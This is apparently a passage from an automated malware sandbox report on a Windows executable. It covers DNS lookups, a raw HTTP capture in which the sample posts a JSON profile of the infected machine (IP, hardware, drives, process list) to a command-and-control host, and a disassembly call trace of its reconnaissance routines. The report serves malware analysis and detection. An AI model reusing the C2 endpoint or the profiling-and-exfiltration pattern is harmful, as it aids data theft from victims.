                                        Dec 31, 2024 15:42:11.517528057 CET53573731.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:11.517716885 CET53573731.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:14.087248087 CET5737553192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:14.087338924 CET5737553192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:14.764789104 CET53573751.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:14.764806032 CET53573751.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:15.460525036 CET5737753192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:15.460596085 CET5737753192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:15.467133999 CET53573771.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:16.046791077 CET53573771.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:37.938611031 CET5352423162.159.36.2192.168.2.3
                                        Dec 31, 2024 15:42:38.410310984 CET6133653192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:38.417468071 CET53613361.1.1.1192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 31, 2024 15:42:08.268982887 CET192.168.2.31.1.1.10x39fdStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:08.269068956 CET192.168.2.31.1.1.10xd2a8Standard query (0)httpbin.org28IN (0x0001)false
                                        Dec 31, 2024 15:42:10.601010084 CET192.168.2.31.1.1.10x2813Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:10.601079941 CET192.168.2.31.1.1.10xc6ddStandard query (0)home.fortth14vs.top28IN (0x0001)false
                                        Dec 31, 2024 15:42:14.087248087 CET192.168.2.31.1.1.10x887Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:14.087338924 CET192.168.2.31.1.1.10x1811Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                        Dec 31, 2024 15:42:15.460525036 CET192.168.2.31.1.1.10x585eStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:15.460596085 CET192.168.2.31.1.1.10x9b96Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                        Dec 31, 2024 15:42:15.472764015 CET192.168.2.31.1.1.10x585eStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:38.410310984 CET192.168.2.31.1.1.10x49c5Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 31, 2024 15:42:08.276026011 CET1.1.1.1192.168.2.30x39fdNo error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:08.276026011 CET1.1.1.1192.168.2.30x39fdNo error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:11.517528057 CET1.1.1.1192.168.2.30x2813No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:14.764789104 CET1.1.1.1192.168.2.30x887No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:16.406032085 CET1.1.1.1192.168.2.30x585eNo error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                        Dec 31, 2024 15:42:38.417468071 CET1.1.1.1192.168.2.30x49c5Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • httpbin.org
                                        • home.fortth14vs.top

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.34971234.147.147.173805512C:\Users\user\Desktop\XJiB3BdLTg.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 31, 2024 15:42:11.555784941 CET12360OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                        Host: home.fortth14vs.top
                                        Accept: */*
                                        Content-Type: application/json
                                        Content-Length: 502792
                                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 37 32 39 36 31 32 38 38 32 37 38 31 31 35 30 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8472961288278115008", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 380 }, { "name": "svchost.exe", "pid": 684 }, { "name": "svchost.exe", "pid": 892 }, { "name": "svchost.exe" [TRUNCATED]
                                        Dec 31, 2024 15:42:11.560930014 CET4944OUTData Raw: 32 59 76 54 5a 66 61 52 61 6d 37 75 76 73 5c 2f 6d 65 56 39 6f 6d 32 65 59 33 37 52 34 4b 5c 2f 53 75 38 41 66 70 45 5a 6c 6e 57 54 2b 44 76 48 76 2b 75 47 59 38 4f 34 48 44 35 6e 6e 47 47 5c 2f 31 58 34 30 34 66 38 41 71 65 42 78 57 49 65 46 6f
                                        Data Ascii: 2YvTZfaRam7uvs\/meV9om2eY37R4K\/Su8AfpEZlnWT+DvHv+uGY8O4HD5nnGG\/1X404f8AqeBxWIeFoV\/a8UcO5JQxHPXTp+zwtSvVh8U6cYe8fkHi99GXxv8AAbL8nzXxX4J\/1VwGfY2vl2U4j\/WThHPPreMw1BYmvR9nw3n2cVqHJQkp8+Jp0aUvhhOU04nB0U9lxyOn8qZX9EH4OFFFFBpT6\/L9SF4+Q\/v\/AJ\/
                                        Dec 31, 2024 15:42:11.560975075 CET4944OUTData Raw: 74 42 71 4d 62 5a 38 36 4f 5c 2f 77 43 35 5c 2f 70 36 2b 5c 2f 70 5c 2f 6e 4e 48 38 57 7a 39 33 2b 38 5c 2f 31 58 37 33 30 5c 2f 7a 2b 76 65 70 4a 50 33 65 7a 5a 4e 76 66 7a 66 4e 6c 6b 5c 2f 35 34 5c 2f 6c 33 5c 2f 4c 46 4a 35 63 66 38 66 7a 76
                                        Data Ascii: tBqMbZ86O\/wC5\/p6+\/p\/nNH8Wz93+8\/1X730\/z+vepJP3ezZNvfzfNlk\/54\/l3\/LFJ5cf8fzv\/wAspJP9f\/n+VB0Af4H37PLi\/dSf6L\/L17GqyyFWR3\/6d\/ef\/j6+vX6VZ8t2\/j85JP8Alp0+mccU14\/m2I\/nIJe\/\/LH\/APV\/9f6gEYkfzH3+Ycf8tPNMGP5\/545oZj5fzpHCksvm+ZH2\/wDrf
                                        Dec 31, 2024 15:42:11.561111927 CET14832OUTData Raw: 38 4b 72 73 75 37 2b 58 31 71 7a 76 5c 2f 41 48 69 4c 5c 2f 6e 31 5c 2f 2b 76 38 41 5c 2f 71 71 47 6a 32 66 6e 2b 48 5c 2f 42 4e 43 4c 59 66 62 5c 2f 50 34 55 79 72 46 52 50 31 5c 2f 44 2b 70 6f 39 6e 35 5c 2f 68 5c 2f 77 54 6f 4b 33 6c 65 79 5c
                                        Data Ascii: 8Krsu7+X1qzv\/AHiL\/n1\/+v8A\/qqGj2fn+H\/BNCLYfb\/P4UyrFRP1\/D+po9n5\/h\/wToK3ley\/l\/8AWpCu3jt2\/wA9ano27uMVobe185f18yvUcnb8alZccHkGopO340GsN\/l+qI6KKKDUr0UUUGlPr8iPy\/f9P\/r1C\/3T+H8xVqq9BoRbD7f5\/CkKlec9\/wAampCu71\/Co515\/wBfM09p5fj\/AMAp7
                                        Dec 31, 2024 15:42:11.565957069 CET2472OUTData Raw: 72 78 52 34 35 30 2b 35 2b 4b 57 70 2b 48 4e 55 48 68 5c 2f 78 48 71 58 68 65 50 77 4c 38 4d 76 48 36 61 46 34 4f 30 54 78 49 38 48 68 75 39 2b 49 66 78 51 6c 2b 48 66 77 2b 5c 2f 74 78 72 2b 77 67 38 55 54 53 65 47 5c 2f 46 33 5c 2f 43 50 31 62
                                        Data Ascii: rxR450+5+KWp+HNUHh\/xHqXhePwL8MvH6aF4O0TxI8Hhu9+IfxQl+Hfw+\/txr+wg8UTSeG\/F3\/CP1bzU7vR9NW+8RWlnoN\/B8fvih+zRrPhS+1CRvFvh\/wCKvwe0fwZrPjjTNUsYdPfRzp9jF450a0t72x1+8lur2O9xaJZLZ3t7GE8WfDjHY2hl+E4vymvi8XXoYXB04VK3JjcRiKmGoxo4KvKiqGMnSxGNweGxawtWr
                                        Dec 31, 2024 15:42:11.565984011 CET12360OUTData Raw: 6a 39 48 37 78 6f 6e 68 71 4f 4c 66 68 31 78 4a 53 6f 34 71 70 69 4b 56 44 36 78 68 71 57 46 71 7a 72 34 54 47 30 73 75 78 47 48 2b 72 59 6d 74 53 78 45 4d 54 44 47 56 36 4e 4a 59 65 64 4b 4e 61 71 70 71 72 53 68 4f 69 6e 55 58 51 31 45 5c 2f 58
                                        Data Ascii: j9H7xonhqOLfh1xJSo4qpiKVD6xhqWFqzr4TG0suxGH+rYmtSxEMTDGV6NJYedKNaqpqrShOinUXQ1E\/X8P6mo7K6jvrO0vYf9VeW0F1F3\/d3ESSpyOvyuOanvYWs9S+G1rcat4Vh0b4m\/Dvx\/8AFLT\/ABpPrGoxeD\/CvhL4RyeKP+FwT+PNQ\/sFtR0O\/wDhZZeEtQ1Txdp2n6RrlydOvvD9x4fXXf8AhJNDW\/8Arc
                                        Dec 31, 2024 15:42:11.566128969 CET24720OUTData Raw: 6b 66 34 6a 54 5c 2f 47 61 66 56 76 68 39 71 6e 68 62 56 46 38 57 58 66 78 4b 5c 2f 62 44 2b 4a 75 76 53 2b 4c 39 62 75 39 48 31 6e 77 6c 72 73 57 71 4a 50 50 71 55 76 67 54 54 37 65 61 7a 2b 61 76 46 32 76 66 44 48 78 46 61 66 74 48 5c 2f 41 42
                                        Data Ascii: kf4jT\/GafVvh9qnhbVF8WXfxK\/bD+JuvS+L9bu9H1nwlrsWqJPPqUvgTT7eaz+avF2vfDHxFaftH\/ABE0G+1Twp8R\/wBtP9nG3Piv4I+KNM+K3ivxX8PP2lv+G2P2ZfjJ8SdAsfinqvh3WtH8XfCfxzo\/gv4kfEr4YeJfE3jm78Y6FpdjL8PfiPJL4osPD3iX4g\/ocdG0gq6HStNKyMXdTY2u13JBLOPKwzEgEscnIBzx
                                        Dec 31, 2024 15:42:11.607551098 CET23484OUTData Raw: 77 37 73 5c 2f 76 37 50 6e 5c 2f 41 4e 76 5c 2f 41 4a 37 64 61 6d 6b 5c 2f 64 37 30 6b 66 35 4a 50 2b 65 6e 5c 2f 41 43 78 5c 2f 2b 76 7a 6a 5c 2f 77 44 56 54 50 6c 5a 58 32 76 48 76 38 72 7a 66 4c 5c 2f 35 59 51 57 5c 2f 2b 66 77 78 39 61 44 53
                                        Data Ascii: w7s\/v7Pn\/ANv\/AJ7damk\/d70kf5JP+en\/ACx\/+vzj\/wDVTPlZX2vHv8rzfL\/5YQW\/+fwx9aDSnU+Vvw\/4G\/TUh2\/fh3\/J5v73H+Gev+c4pnmJ5c38fmfupfx9ev8Ak4p\/zrGn8f7r9eM\/56U\/5G++0iZ\/dfJ+\/wDb\/D\/Gg2K3+s3yZ3+Z+6l\/e+R5\/TP+fxpkkf8AG6F0\/wCWuf8APUVM0cO1Pkl
                                        Dec 31, 2024 15:42:11.660196066 CET3708OUTData Raw: 61 70 61 66 38 41 37 48 77 6e 65 65 49 62 37 34 58 66 45 44 34 6c 5c 2f 43 61 66 78 6a 34 59 31 50 77 50 34 78 5c 2f 34 56 5c 2f 77 43 4d 39 66 38 41 43 38 66 69 76 77 4e 72 63 74 76 4a 72 76 67 76 78 43 50 44 32 70 61 4d 2b 73 2b 46 4e 62 46 72
                                        Data Ascii: apaf8A7HwneeIb74XfED4l\/Cafxj4Y1PwP4x\/4V\/wCM9f8AC8fivwNrctvJrvgvxCPD2paM+s+FNbFrAmq+HtUkvdI1ARR\/bLKfy0C\/wtivo0cf4GHFFbJ88yHFvPFjcLl2W4qGZUlkOAxeJy7FVo5HjKmYVv7Kx9athMTWpY2NPFYfLq9fCVcPlVWllWGwlb\/T3IfpoeFdTMeAJcQcL8VYalwljOHc0zXHYGvlElxPjs
                                        Dec 31, 2024 15:42:11.707741976 CET1236OUTData Raw: 63 6b 41 38 59 46 57 5c 2f 44 66 37 4e 48 77 6f 38 47 36 73 75 72 2b 47 4e 49 75 4e 48 76 56 4f 57 65 30 6c 74 67 4a 53 51 77 59 79 37 37 4a 33 59 73 48 49 59 68 31 7a 78 33 79 54 36 6d 54 5c 2f 41 45 54 75 4e 38 74 7a 66 68 72 48 7a 34 76 77 45
                                        Data Ascii: ckA8YFW\/Df7NHwo8G6sur+GNIuNHvVOWe0ltgJSQwYy77J3YsHIYh1zx3yT6mT\/AETuN8tzfhrHz4vwEsNlHE1DiLMaUHm0q2Zzo5di8pp4epWeZU68Vh8vxawVPE0MRhcdi8FhMNhc+xWfulGu\/K4m+nT4c57w3xTlFPgPNaeNzjI6OS5TiZ\/2CsNlOHw966p0sI8jr4b2WIzLlzOphsRhsdgMJjniK+R4LIniqkUfEj\/
                                        Dec 31, 2024 15:42:11.755600929 CET1236OUTData Raw: 2b 44 66 42 64 44 68 37 47 38 4c 5a 7a 6d 57 5a 59 33 4d 4d 36 78 58 46 47 4d 70 34 72 42 76 44 35 70 68 4d 58 6c 7a 79 37 4a 73 74 70 55 4b 32 58 31 61 31 44 43 35 59 71 32 4f 78 64 52 55 4d 64 68 6c 6a 73 56 69 6b 73 78 70 34 37 44 34 58 43 55
                                        Data Ascii: +DfBdDh7G8LZzmWZY3MM6xXFGMp4rBvD5phMXlzy7JstpUK2X1a1DC5Yq2OxdRUMdhljsViksxp47D4XCUKHTePfA3jv4wfCP9p\/Urf4e\/tJ\/tva7pP\/BWP\/goHq6fGr9iOxttD+FngbUtY+BH7MuqWniP4i+CdC+B37V8Oq+Ak1aW507TdN0\/4peEJribw14iJ+Knii6v3121xda0f4+fCP4meF\/2pvG+hfFzwl+yjf
                                        Dec 31, 2024 15:42:14.032013893 CET138INHTTP/1.1 200 OK
                                        server: nginx/1.22.1
                                        date: Tue, 31 Dec 2024 14:42:13 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1
                                        Data Raw: 30
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.34971334.147.147.173805512C:\Users\user\Desktop\XJiB3BdLTg.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 31, 2024 15:42:14.770884991 CET99OUTGET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                        Host: home.fortth14vs.top
                                        Accept: */*
                                        Dec 31, 2024 15:42:15.399163961 CET353INHTTP/1.1 404 NOT FOUND
                                        server: nginx/1.22.1
                                        date: Tue, 31 Dec 2024 14:42:15 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 207
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.34971534.147.147.173805512C:\Users\user\Desktop\XJiB3BdLTg.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 31, 2024 15:42:16.412415981 CET172OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                        Host: home.fortth14vs.top
                                        Accept: */*
                                        Content-Type: application/json
                                        Content-Length: 31
                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                        Data Ascii: { "id1": "0", "data": "Done1" }
                                        Dec 31, 2024 15:42:17.134371996 CET353INHTTP/1.1 404 NOT FOUND
                                        server: nginx/1.22.1
                                        date: Tue, 31 Dec 2024 14:42:17 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 207
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.34971134.197.122.1724435512C:\Users\user\Desktop\XJiB3BdLTg.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-31 14:42:08 UTC52OUTGET /ip HTTP/1.1
                                        Host: httpbin.org
                                        Accept: */*
                                        2024-12-31 14:42:09 UTC224INHTTP/1.1 200 OK
                                        Date: Tue, 31 Dec 2024 14:42:09 GMT
                                        Content-Type: application/json
                                        Content-Length: 31
                                        Connection: close
                                        Server: gunicorn/19.9.0
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: true
                                        2024-12-31 14:42:09 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                        Data Ascii: { "origin": "8.46.123.189"}


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:09:42:06
                                        Start date:31/12/2024
                                        Path:C:\Users\user\Desktop\XJiB3BdLTg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\XJiB3BdLTg.exe"
                                        Imagebase:0x1c0000
                                        File size:4'471'296 bytes
                                        MD5 hash:767F4AFF1A89B1ABFE6A843F7750BD5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:2.5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:14.6%
                                          Total number of Nodes:594
                                          Total number of Limit Nodes:96
                                          execution_graph 67838 200700 67841 200719 67838->67841 67852 20099d 67838->67852 67842 2009f6 67841->67842 67844 2009b5 67841->67844 67846 200a35 67841->67846 67841->67852 67856 1c7310 _open localeconv localeconv 67841->67856 67857 1fb8e0 _open localeconv localeconv 67841->67857 67858 22f570 _open localeconv localeconv 67841->67858 67859 1eeb30 _open localeconv localeconv 67841->67859 67860 2213a0 _open localeconv localeconv 67841->67860 67861 2439a0 _open localeconv localeconv 67841->67861 67862 1eeae0 _open localeconv localeconv 67841->67862 67864 1c75a0 67842->67864 67844->67852 67863 2050a0 _open localeconv localeconv 67844->67863 67868 204f40 _open localeconv localeconv 67846->67868 67854 1c75a0 3 API calls 67854->67852 67856->67841 67857->67841 67858->67841 67859->67841 67860->67841 67861->67841 67862->67841 67863->67852 67865 1c75aa 67864->67865 67866 1c75d1 67864->67866 67865->67866 67869 1c72a0 _open localeconv localeconv 67865->67869 67866->67854 67868->67852 67869->67866 67324 1c255d 67325 549f70 67324->67325 67326 1c256c GetSystemInfo 67325->67326 67327 1c2589 67326->67327 67328 1c25a0 GlobalMemoryStatusEx 67327->67328 67335 1c25ec 67328->67335 67329 1c263c GetDriveTypeA 67331 1c2655 GetDiskFreeSpaceExA 67329->67331 67329->67335 67330 1c2762 67332 1c27d6 KiUserCallbackDispatcher 67330->67332 67331->67335 67333 1c27f8 67332->67333 67334 1c2842 SHGetKnownFolderPath 67333->67334 67336 1c28c3 67334->67336 67335->67329 67335->67330 67337 1c28d9 FindFirstFileW 67336->67337 67338 1c2906 FindNextFileW 67337->67338 67339 1c2928 67337->67339 67338->67338 67338->67339 67340 1c3d5e 67343 1c3d30 67340->67343 67342 1c3d90 67343->67340 67343->67342 67344 1d0ab0 67343->67344 67347 1d05b0 67344->67347 67348 1d07c7 67347->67348 67354 1d05bd 67347->67354 67348->67343 67353 1d066a 67359 1d07ce 67353->67359 67360 1d06f0 67353->67360 67366 1d73b0 _open localeconv localeconv 67353->67366 67354->67348 67354->67353 67354->67359 67364 1d03c0 _open localeconv localeconv 67354->67364 67365 1d7450 _open localeconv localeconv 67354->67365 67355 1d0707 WSAEventSelect 67355->67359 67355->67360 67356 1d07ef 67357 1d0847 67356->67357 67356->67359 67379 1d6fa0 67356->67379 67357->67359 67362 1d09e8 WSAEnumNetworkEvents 67357->67362 67363 1d09d0 WSAEventSelect 67357->67363 67378 1d7380 _open localeconv localeconv 67359->67378 67360->67355 67360->67356 67367 1c76a0 67360->67367 67362->67357 67362->67363 67363->67357 67363->67362 67364->67354 67365->67354 67366->67353 67368 1c76e6 send 67367->67368 67369 1c76c0 67367->67369 67371 1c76d3 67368->67371 67377 1c7704 67368->67377 67369->67368 67370 1c76c9 67369->67370 67370->67371 67372 1c770b 67370->67372 67387 1c72a0 _open localeconv localeconv 67371->67387 67388 1c72a0 _open localeconv localeconv 67372->67388 67375 1c771c 67389 1ccb20 _open localeconv localeconv 67375->67389 67377->67360 67378->67348 67380 1d6feb 67379->67380 67382 1d6fd4 67379->67382 67380->67357 67381 1d7207 select 67381->67380 67386 1d7233 67381->67386 67382->67380 67382->67381 67383 1d726b __WSAFDIsSet 67384 1d729a __WSAFDIsSet 67383->67384 67383->67386 67385 1d72ba __WSAFDIsSet 67384->67385 67384->67386 67385->67386 67386->67380 67386->67383 67386->67384 67386->67385 67387->67377 67388->67375 67389->67377 67870 1c29ff FindFirstFileA 67871 1c2a31 67870->67871 67872 1c2a5c RegOpenKeyExA 67871->67872 67873 1c2a93 67872->67873 67874 1c2ade CharUpperA 67873->67874 67876 1c2b0a 67874->67876 67875 1c2bf9 QueryFullProcessImageNameA 67877 1c2c3b CloseHandle 67875->67877 67876->67875 67879 1c2c64 67877->67879 67878 1c2df1 CloseHandle 67880 1c2e23 67878->67880 67879->67878 67881 1d1139 67895 1fbaa0 67881->67895 67883 1d1148 67884 1d1512 67883->67884 67885 1d1161 67883->67885 67892 1d0f00 67884->67892 67903 1d22d0 _open localeconv localeconv 67884->67903 67885->67892 67899 1d0150 67885->67899 67889 1d0150 _open localeconv localeconv 67889->67892 67891 1d0f7b 67892->67889 67892->67891 67893 1c75a0 _open localeconv localeconv 67892->67893 67904 1fd4d0 closesocket _open localeconv localeconv 67892->67904 67905 1d4940 _open localeconv localeconv 67892->67905 67906 1d3900 _open localeconv localeconv 67892->67906 67893->67892 67896 1fbb60 67895->67896 67898 1fbac7 67895->67898 67896->67883 67898->67896 67907 1e05b0 _open localeconv localeconv 67898->67907 67900 1d0167 67899->67900 67902 1d01c3 67900->67902 67908 1d30d0 _open localeconv localeconv 67900->67908 67902->67892 67903->67892 67904->67892 67905->67892 67906->67892 67907->67896 67908->67902 67390 274720 67394 274728 67390->67394 67391 274733 67393 274774 67394->67391 67401 27476c 67394->67401 67402 275540 closesocket 67394->67402 67396 27482e 67396->67401 67403 279270 67396->67403 67398 274860 67408 274950 67398->67408 67400 274878 67401->67400 67414 2730a0 closesocket 67401->67414 67402->67396 67415 27a440 67403->67415 67405 279297 67407 2792ab 67405->67407 67446 27bbe0 closesocket 67405->67446 67407->67398 67409 274966 67408->67409 67411 2749c5 67409->67411 67413 2749b9 67409->67413 67447 27bbe0 closesocket 67409->67447 67410 274aa0 gethostname 67410->67411 67410->67413 67411->67401 67413->67410 67413->67411 67414->67393 67441 27a46b 67415->67441 67416 27aa03 RegOpenKeyExA 67417 27aa27 RegQueryValueExA 67416->67417 67418 27ab70 RegOpenKeyExA 67416->67418 67419 27aa71 67417->67419 67420 27aacc RegQueryValueExA 67417->67420 67421 27ac34 RegOpenKeyExA 67418->67421 67438 27ab90 67418->67438 67419->67420 67427 27aa85 RegQueryValueExA 67419->67427 67423 27ab66 RegCloseKey 67420->67423 67424 27ab0e 67420->67424 67422 27acf8 RegOpenKeyExA 67421->67422 67440 27ac54 67421->67440 67425 27ad56 RegEnumKeyExA 67422->67425 67429 27ad14 67422->67429 67423->67418 67424->67423 67428 27ab1e RegQueryValueExA 67424->67428 67426 27ad9b 67425->67426 67425->67429 67430 27ae16 RegOpenKeyExA 67426->67430 67431 27aab3 67427->67431 67436 27ab4c 67428->67436 67429->67405 67432 27ae34 RegQueryValueExA 67430->67432 67433 27addf RegEnumKeyExA 67430->67433 67431->67420 67434 27af43 RegQueryValueExA 67432->67434 67445 27adaa 67432->67445 67433->67429 67433->67430 67435 27b052 RegQueryValueExA 67434->67435 67434->67445 67437 27adc7 RegCloseKey 67435->67437 67435->67445 67436->67423 67437->67433 67438->67421 67439 27afa0 RegQueryValueExA 67439->67445 67440->67422 67442 27d190 localeconv localeconv 67441->67442 67443 27a4db 67441->67443 67444 27b180 localeconv localeconv 67441->67444 67442->67441 67443->67416 67443->67429 67444->67441 67445->67434 67445->67435 67445->67437 67445->67439 67446->67407 67447->67413 67448 697460 67458 551360 67448->67458 67450 697492 67451 69749e 67450->67451 67465 548f70 67450->67465 67454 551360 2 API calls 67455 6974e3 67454->67455 67457 6974fc 67455->67457 67472 551420 localeconv localeconv 67455->67472 67459 5513b0 67458->67459 67460 551379 67458->67460 67462 54d1d0 2 API calls 67459->67462 67473 54d1d0 67460->67473 67464 5513d0 67462->67464 67463 551398 67463->67450 67464->67450 67480 548e90 _open 67465->67480 67467 548f82 67468 548e90 _open 67467->67468 67469 548fa2 67468->67469 67470 548f70 _open 67469->67470 67471 548fb8 67470->67471 67471->67454 67472->67457 67477 54d1ed 67473->67477 67474 54d504 localeconv 67474->67477 67475 54c9c0 localeconv 67475->67477 67476 54ca50 localeconv 67476->67477 67477->67474 67477->67475 67477->67476 67478 54d3ae 67477->67478 67479 54cc90 localeconv 67477->67479 67478->67463 